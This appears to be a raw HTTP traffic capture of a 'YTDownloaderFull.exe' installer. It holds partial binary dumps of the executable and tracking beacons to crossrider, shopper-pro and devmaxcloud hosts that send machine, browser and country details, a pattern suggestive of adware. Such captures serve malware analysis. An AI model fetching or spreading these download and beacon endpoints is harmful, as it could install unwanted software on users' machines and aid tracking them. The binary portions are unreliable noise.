..6.?......m......._.}f......J....Z?......N.f3...w..g . 6b3h.oY.)=R...
/1l..Oc|... .$8..53..Aw...,.&..UA]W.K.q.]^.*|.5......6.^.P.&..M......6
'.Wu.v..&q.U9t.`....q.bq.!...UX.n..HH..E.u.H:.3.n.......fF[....s...W.4
b-"..."...a...'q.X.."_.."..{[email protected]."/..... ..b...)#...N..W...I.|`
.[..k...Su........iS...].[i...,...L.t.z:.V(8Jo...Y.....?..w.....m..o&g
t;%....X..;...........E...?..}.....Mf....z..y17.H..P...........|i.]...
u........C.Q...^.PS8q.<.[.S...Qv.)...aF...%qP.......7..,;SZ:D....J.
.;<.......q..Q..U9..O.S.a.^.`. }H.P..N2.b...T ,..x....8WP....L..P2m
a...4U..~EW..r..}.....T..E..... ....mK...L....i1..:._.UA=....D...Rk .Z
.....6.J.!.%..l..#.F...U.^.^z.........?.o3AN....*.............O...C}..
.Z]...Ow....r......XM..yx.. #...5c!.h..#[3........M.....u....$..p.. ..
...214..p.U.)............c.Z.A...>oO.p.......?.*.....uY...;....(...
.fz.E6.D.g9t.{q..|.|....S.:. ........A&`..1C.~.....l....b.TqX...= .a.N
.L..`.....*u-a,. X7.E..\v......V...V..[.._=.....z.'. ...}....H"..{9.{.
.......:{....JR!3U......p..7.8.Z>..d.....i.7..(Z...T...(....y..0..J
#.........b....Jjc]TX&.....w...q...WV...R9.E...?Z....AlS8X..w^>....
.B.....-.....~V.*..l{.......i`...1.~.D.....3S..3<....1../......<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:23 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3000000-3249999/7202264
..p..oZ~........y./]]..J...:[email protected]~"..hE\w.}......l..
........f..u..d.7..,c-..`/t.3..._..qvj..Pl.......' ..t......&b....1s..
..4....L..#d....4P..}lV......X.9.*..7..m..e.L&.G....u.q.p.._._5...A..s
.R....H........k..I....6.h4Q...|...YS.....y=NLf.]....j,6..m.0/...... .
[email protected]>.h5........OD. rV.`...!..&.,.K........$....X..G~..
A......A.#]....WP%..L;..k..^.`n<B.3....{3 .....}.... .U..r>c."&l
t;.@|W,Sv.&...X6..{N.A.g]wk..J3.*e.._..gb......x....^e......>....:.
..t....Y.........tV..P."........!r..qj.p...&..5....S.?..o.j'.R^.Y.....
.-.&IH...-...4.....IB...*8..8..........7..........p...!..F)I..D^u...i.
..0.....:...*V...V....jV..?kA'..~..2_LrK.........>...!u...7..A..QS.
`E.dA"R.f..tw....~.r.~Ty.D?..../44.BB..f..z..K...Mx...."...Dz.r..i..8.
...D7.q.......,......)C.),..(....J2..-.0.x.....#..Q..Q4.......Ba..]i..
O)2..$`....4..J.......6.-..\,Z.G......dU..}...Ky....>...<*..>
."..nC...._s.w.Xbi...B..]..v....V.hE..T...1.v6....##........S...>..
..X..mM.*.F..{b.Y........C..ik....3Q.&,....,6...........%..2..y.m].6..
....:.u|.G..W....I..Y...Z..0..#../{[F.../O.5.p,..C...u34.|..f..s0...Y.
..?..1.d.....G..A.'...8.4.i...Pa..xu....)K..8....I...?...<..5G..xz.
....g...b.. ...._.Ej..g.d.M..j..X!......nP_..L..}.............<6..:
.....sp...}.....]~..$..4.f.<..g.j.....)....S..W..?._...@/e..EpY.7.6
......\...........`.9..{.?.G.[G..Z.A.....Y..._.....7.R...]. ..h..O. .@
....(...*:......1Y.I..M0.l...(ar....x.........2U..<.iklM..........Q
|C..C.ov..%v.yH8JY.Ht..H.. ..{.{..|...;.52...%......k.K....K.....X<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:23 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 3500000-3749999/7202264
.j....X..M....8..W....[..x.....1Z..!.. ...&.....|.I4..P.[.H.8.v.K..G.9
........8.vy.............6.C..ld......H.P.l 9.V....:.^..J&.=.t.3..2...
.......M...V"...Wd...US.M. $.m^s.H.....G.k.m.8..V..m.....9..`@......)&
..bW...U{ .p...=.=..h...U.",,c. qI.X.....}.XE.........T.....D..mQ.....
%.r..}_.s..V.a9..-.....v.....5.C{.?....nf...0.)....9..... ......i.&...
. ....d..a.....y...7G.p."%_b....#wZ=m:.xv1.f3.....M/.s...F.i....J.....
DA2......;W../>.....U.g*..v.F........gx|..............P.I,sl>6.M
b_.1.C!\7.x...4m....>).n^9;"..[.....C.. v..7..q..e:...K^....0*.C6$,
......|3.].....a..U'.H..<D.v.j>......... .....G...n"O].|9.q.d)..
.$.<"j..v%sQW^.8...........3^.g F.........Y......<m..H....@b.._.
.(.".).[>&.........8.$.!S..?<....n...N...W.$..;k:H.. ...Cg...>
;(....c..Y.....'t..gn5W8......a]..0...CU.9V. ?..`....x.......$.....8).
!.. 2..>...c.dHG..E}L...F..-.h..~e....... \..:V..i....Fsn=".Qb$%,.@
^[email protected]{[......f.Z.H...........7/..]..P..F..6.2..
(..8.._..;.G.{A..#.L.........|B.>....I|..#.0S.I......?...Hr.G....#7
rv...#.t1...b~. .%..h..^...Cg9....../.K....lI....l.....g.&w..r....0...
}..-..sz..&aoHF.5..`OC.|&"..=..){a......;/........c..O)m...m.f.:.....V
4Hps...wV...Iro.g62.La...9.@c...^....!.........u.\@.......M..E........
...r..IgS~.=.>=.J.....v,[email protected].^c..3\...G..........|.....
...j.^...f..5e[.3fC..b.6...O..jK.p..!..c(..........R.7(*.uT.'..j.Au~W;
.g.n.S..CG..7.._.e9..*x.Qs......V/....:.1...Xn..Q...}....:.;..P..l...a
./y..R.Z.6...D......Y.>..,..BL....z......<.S.D.X.rP.........<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4250000-4499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:24 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4250000-4499999/7202264
 ..>.:..Y...6....<....... 8.d..........wf....qh.i.jd...Dg..Q..yr
b..6.u.... ....R'.. y....8:..?.s.. _Q..3...&...?<q.CI...M}o...4....
....i_...;.jB...MM..&.9L....q.E..3..N.Yb.z'D..N2.~..ge...|y.~...K.b=. 
......]hs{.E0......'.$..[Y.O.u.Y..{i|...k;.z...,...Z.75N...r.&|\.$... 
.....A.... 2.HS\|........Y*<......8D..~9..DW2c.f..G...p....dcLoj$..
c..P:^..f..Tm.....>.e....*..}.... .g.".0.j.. `O...F>(.x.jX....5.
.bY.>C.~.(.?.0..R1.....s.J...$.u.D.......T~..."..}.k..?..._}.`n.H2d
qd...|..E....c...3y.....G.3.......7./y...jD..7..q.;.w<"E..{..N....@
..B..X...5....{SD/a.Ku..Hs..b.....'......q&.)b.O..7.}B.......I.9.Q.O.E
..K.B...z..c...i...~$............~.....J..8.]..0.A..iN.|9...-g.u.....E
........q.....>w&...|..AK.|........#..n..}....B.hc`........@@Zr....
.w...Q;q.:....L.WzD..o.[.J.......3&......[..d3.:)... ."_t..be..g3....w
.I...... ..S.. 2...QO...1D0.#.4......1..F..r..P.jIJg.J.G.f..l....'..Lm
....5?.8N...\MY.....l......w3ne2OR......~_1..<..ygo...*N..H10.....d
.lG..c..r&m....'.... .i .ra..l...|...tc.}`....!.#...q.$s. .H.8*..9....
y....(6...%7.M.5.............].S.../]!.h.B5.K.4L...u.la..4...e...i.._.
.!........g.........s...3..`.,......p..V.X..Of{..Y.,..F S.ur.].4....Oy
..r.g....Z..\..1....%..<.1...V!KyVN.....v..}.,V.......y.0#....o.- .
=_..;l..... ...1..c=.....~....n v.P.....Q..p.x....K....68;r....3....sO
z..I.......S.V..Z]{.......s.F9..L....s:V....*<..8~..........3..$...
.l...#.ji....!....5.p... ...-.t.....<).y.=.....L......kL..b.T..:.$.
.?.A$.......*.u.U...|.m[A.#M..3....a.b......g...L#...O^`.T.x^KK...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4750000-4999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:24 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4750000-4999999/7202264
.....v.C]m.\..G8.........0{.v.......f..(i....A..i..'....~...f.....8.CZ
...s.....YgqW.KD|..%n...<H..J .......s6>.'B.R......t3..#..~..f.)
;lO......y..@TI.%[email protected],................H..
.G......4FF...D......W.H...:...UEB..x....u...d.o.....}S=..D..S.g.\x~..
Y...m....7.....E4..a..4..N.=......&lq..Xj..o.#v....~.U..K...s%.U..9..,
#D;.u\-.M....|d..[..ED`....4O.:......G....4...6r/.Zj....p...8.*..#...6
P.}..<..L.....;0....5....o_.,B..=.P.9.h..V[..2.Oi.....Z$...d..sV1P.
........].....i9.'.. 4j.....(uR..`...2.vW..f.T..I.....s.R..O"..z.r..rG
m...G4.q..$.J|...H.w.E.o...d.M..,c......fd.s..KA/.S#.....u5!.p..f.....
.........*NUB.9...Vs..`][email protected]{`..R....U.......'G/."Z ^.... .
?|..d..{.9....".....F..#..;r......nX.....P .HT.j..s4-FU..~%.{|.p.~.6u.
..u`...Z..{.^.k>..Rd.X...xU...$..{....Vq....O.....$J8...%].....0..b
!N....F./...Pat..0Q..>..&..i.Y..t...T.n....VRc6...........N:...N."L
.......G..2z.B`[email protected].~....1.`>..dQMpWi...-...0b......v..jX
....`..H.jl.....2....z..3a..IYp7G.g.Dn...>B. .B.....p.k....B..(..P.
.G....'?V..$...O.....^:...o.~G.'...c!Q)[email protected]......^.....?!r..J..h..&
lt;.......-...0.. U-...F.N.3Cc.!........,..A.).....D..#[email protected].......
G..=.y..X....O.....d..^...C.......>..~j,U......3.......X.d.n.WiU. B
..k..v|.#b..$..........R.Q.........2}.q........!....B:wW...U./.^o/3Z..
.;.!.......U.....Y..NyM.O...x.. ....O.8............^4.....d...S.......
.uw..UG;[email protected]....,4&.P...DQ7h=.......c
:......IO...<..)_..~#...(...`....*...d.G`.FAT4...k.F.....c]X8..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5500000-5749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5500000-5749999/7202264
...;[..H..ja..|[t=.1{R..!.l..=o..NY701$.ahw.~.5m.][email protected]..
.{....pV.{.#U..q...........S.U2\..m..~.rl.|.......e)SR.Y9.5.......l...
.Ix..d...M.k..']...uZ?z.i1.fS./D..z(\.M...f2.D`.g... $.o.8.=|c3....i..
k.....^...X5..........5.}...v......:Z.d..W..]..y.u.....T...c........P2
......I.:la6.3S....S\.....[.l.......z.>.B.........n......NV?....^..
e];.....{...r.....j.g.?dw... .g....IT.........:....<l6.ED.S_'.D....
......v.....N.u\.z...4.,<..A.....d%<-..."_....q.Dr.$....$h..sEU.
_.X.h6,.J..D-A..v.#.K.6..t...D.^x4.U...T..*..d...wJ...F..%.'.s.t...^..
.>...K...@.........$bu.1\..X.G..GD._......|".[...{..r...p..J..S..#.
.|..IN.D.aSh"q..G.YH..>..[..fu.wc.j..2....).V.h.4.(....?u~..v.....0
..8......m..p...><.8w62...N....Kg4...#....9..2...l1_21wZ5F>..
.\..?R...^.Mc..F......W.h.d.K....'...P..`..7z..y..7..g."...M....#.....
......;.(f.h.%.........{...kH.(..S....<52.Uw}jV..{..)..?...{K=s..N.
.{......$.jr#.>g...EN...)g.PVx.t...F\(E.S...?.....'.O....;...b'N...
-....SD..p...~..;(..!..7..Qp.V..1......o.n.:....U<6Ug.&D.....G..}..
..U\...=.!\Th.'...m.A.Q...D..s....Y3. ...=..7.v...%.:.].......w...#..w
.....7.x......N....L ......!y.V.;..{....#.F@s.~P.yt...C....:%.w.$.3X@a
.........h...........{....lQ.=.....c.t]I.&.L..a.p......Y.6..gx..a.?...
.....w....NV..V..oLB...[..,....J.6.<._.$...\.....C...Hf.X....AZ.;r.
..7..VPo....E..h...!.I/..T.v..W.1.x.X][email protected][email protected]..
.4..G...H.kX8.8.|.D.g.gk|N...!.".%)Q.]N......I| ...O.....<$RA...y..
.3b!B..3......D.......%&^...t,.. .E....Q...<...;L..;.... !..1..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6250000-6499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

Last-Modified: Thu, 03 Sep 2015 09:59:42 GMT

ETag: "16e931808893c8ff8b77483cff5f5e64"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6250000-6499999/7202264
.?..~N..G......I....].....Bvs3V..2....`.[......r.\d...pz..KN..*.d....W
$.U....j...3."w..x.#........f......Bcq.H.m.py.2t_.5.<...fq.......f.
X.M..T....F.s....o....m...?o...:v.S..q..p..$.,.....{...O.A..i..^......
........Y...[......v..0$.;...9R.......a/..........Q.ue....J.OiL.u.....
[email protected]....}\.o.N.!U...V.@m.....!..b....%...g..3..&..9.b..F.>....
....s.0.|..04.W....S..5l.....C ......z.FI..n.q...4Q..payM.AYz..`..cS..
..........}|@..c6J.X.6.-..\. ...X'o..g.\D. 6.9.#.C...D<.z.\....b..=
.x.w..u...q.e.!2.6.U....&H.\.l8..Vb..h.].C..)....|u.2.XF.o.L...]...V..
........eQod...z|.S.-q.....H..".T.#./.W...O.<.']... /...{f.........
j..0..L.4.Yt..=...../..8q.*i!.6..=...n4....$ .c.yB.<:y.N/..#...P)..
..tp.'.g> .......*{...8.`N... .i..K....p.$.....9..7L....>lZ...s.
@.Tx......RG.5.{i.4...2e..]=.`...............0s.q.\.UoF..h.p....g#\R..
...U...A..Ay.....Qx....\..{x1KEW8.v......r.$.w....n...c.7..K.....n....
w.F..,!. :.V...p..!..L...Ps..8.......>a.....E..s.<)..@....~wJ..s
.esX>n|EO..b.\..1|.....3$rB..z.*...T......M.8.j.A..s.n...y.[..u..I.
.....;..... ..1.h.xp..ew....|..z[.- .`..k.Lg.....-|.x....L.E..Df.t....
......qz ..B.!..`8...t..~.*lc|.12...,..D`a..J._....>..(nGE..by.....
..c......@..';cJ....x.../eRs{.w.>>.xQ{.*..i |.....E5].....QI..\~
.....a..!T.I.S............n..'.W...[.cD..Fc...(.&V....w...9..^......9|
.T.p.]..j.=.=1..-..........;j....m..=.........o3$.Pssk.^....F....]...)
...0...GH....4..2q.'..4.......f\....P.{T.c..h. .e.......C(.3.,....t.&g
t;A..uG[.d.#%k ...(......Zy^..U...t..m.&.QV:.7Xv.&.d3cx..l-_......<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=10665 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:55 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /app/ping.ashx?e=hpY1rXLYst4U4POieyJ7k 86rkSdAtWAb9OMf6TV/k4icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewWDOfBCAJ7mB4JQT6LtkTMxpgmgCnlkE5FxzszKF363rsyHkc2rWtYboW0z9NLN4aF0Tp0k5o7ZtFU bNMpXPLEklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CSSNrM4iVH1I2Ld2YP2inphlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/DisnhnwjIznM4NjlRvaTpGfz3xhcJKC1Reo3n9s2Fs g80z0k6Cr9laSF2XrRbZnBny0uhv3iEz1ZNnAYhSLf3gsJzhYWVjeFKSrgJwIYPupgb31 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

....

GET /app/ping.ashx?e=hpY1rXLYst4U4POieyJ7k 86rkSdAtWAb9OMf6TV/k4icvsFwQStENB87jgWTbK/3s5q cLFxyxYWD4MTU1ewWDOfBCAJ7mB4JQT6LtkTMxpgmgCnlkE5DpohCDelrcGKwcR6VYInl/4c5idw7jB6Y8wSL48Ufj xLoT5lWMa/O51CUbXbhryEU5MDCXDxgXGTnwm6tWTnbG4u8zYbFhDmeeYhnV1BHp9KBlmzyr2/tIpl0LoUca0Y1U3rRkX6gIf7BoJXYNjZQ3hwdfJXYgb/UmU8pxp4SZEjkubKgXkCVysSIQM/WMqj6OkqhoAqzKCHIQkF 4wy/1OplaBX/JKxBlxZ9aXoUf91SyXt9 XnayBMUx nL2MUx5BBCvDUZ0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOTzbANYrsS2gR3bXYBh5GayOJOBpub70rJsT 2HVkea/QSiZE4mNJCuIR62ArRLxq/lEuO9e0hYCneo /8EQQ7EaKr1l icJHo6jHoUXX2l omWJ/Ex9z3tzJVvURajp4qlUQ7Kz5asHZpCy29 Yy361S7rZnnZ2TU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 08 Sep 20
15 06:54:25 GMT..Content-Length: 0......

GET /app/ping.ashx?e=aQQpsP6/AW3r A4x0AgNXRnacjZ2ZC2eBpXMF/9ZtDqRoZJTpqsyZxASc9FSZWyorVov04UjcEj6Cn6xgIPrOr0I8/BqvGRwjNnUrUd2W2BBPpL0iVh6pyYH9jylicula50u3XyigpVREcH6lvzpS5NOnjhl29VMiawHEBbFjHBAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF Jihgvev7iJ04DwqPoy7y/e9FgAYD7IlOOQUT2GlJZn0XRSL9MKpLGeeArtf03VJLT2XCKyxfyg8N9A8dpvtBeO2hc3DbjNrW8PhalNGReGDudXf8s99rZqrmh5G7kLgKqRaV67pS3nBkkuGbiMqeAsg9JWacyDbfAA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:25 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Tue, 08 Sep 20
15 06:54:25 GMT..Content-Length: 0......

GET /app/ping.ashx?e=eISsn0A7mAY luBT5UotGBnacjZ2ZC2eBpXMF/9ZtDqRoZJTpqsyZxASc9FSZWyorVov04UjcEj6Cn6xgIPrOr0I8/BqvGRwjNnUrUd2W2BBPpL0iVh6pz0sajEdtXK5ho/QgOr9gQT2NRySioDRRrzTwCJRAS6WemyrrtcHnO0ys89o9QykRC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXGTnwm6tWTnbG4u8zYbFhDmeeYhnV1BHpJkwA4PeZyrqoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 08 Sep 2015 06:54:26 GMT

Content-Length: 0

GET /21214.ashx?e=hXeqmv1Ipen8DUZEY163AMo8YECNv9u21D73iItxtxEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45BRPYaUlmfRdFIv0wqksZ59ISJu0ort4R6tXJoxLUCgFVyxmCM5MsGHyo0lM9 97QvBR8U17HI5t1W82Rf90R64zSKxHboXxzsriKGopLF7SOBvq/txek 368KsLDi8ejGLqdccWbOXhQkiHPQlSnMR8SmM80PtO/nz2CRmELfmr2Z3kJKtxQJKHi8lJ8ZZ64X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /21214.ashx?e=KSz5qzb2KgIPgAd18hbyriP5Xzi0RWWWjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6XwF8xC533Fc8E2Pd9CMWovNtgMO1a3Sb80v5DDGc2FBbzjSNwj8cRIXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVo0KXYjr4isejZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 9oq3c5-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:54:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Tue, 08 Sep 2015 06:54:59 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /utility.gif?error=done_mem_0&report=mini_s&ver=1729&action=na&ms_vr=3&clock=24187&rnd=24757 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:55:18 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=7088 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:57 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1441695306&asw=0_1073750528_-2147483648_2048&browser=&rnd=1441695306 HTTP/1.1

Host: logs.devmaxcloud.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:55:10 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1441695311.dop003.fr7.t,1441695310.cds001.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Tue, 08 Sep 
2015 06:55:10 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
5..Content-Type: image/gif..X-HW: 1441695311.dop003.fr7.t,1441695310.c
ds001.fr7.c..GIF89a.............,...........D..;..

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 06:55:09 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Tue, 08
 Sep 2015 06:55:09 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=28053 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Tue, 08 Sep 2015 06:54:58 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: vvr4w8-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Tue, 08 Sep 2015 06:54:22 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: h37ppe6Zk1 /6pLFARkTrOXWtoyfemTEd5YqYCGYR LBiBi/gS7brSEmzXuk65Ap

x-amz-request-id: 652609F77E69D35E

